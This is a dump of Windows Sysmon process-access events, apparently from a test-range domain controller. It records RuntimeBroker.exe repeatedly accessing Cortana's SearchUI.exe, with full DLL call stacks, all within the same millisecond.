13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 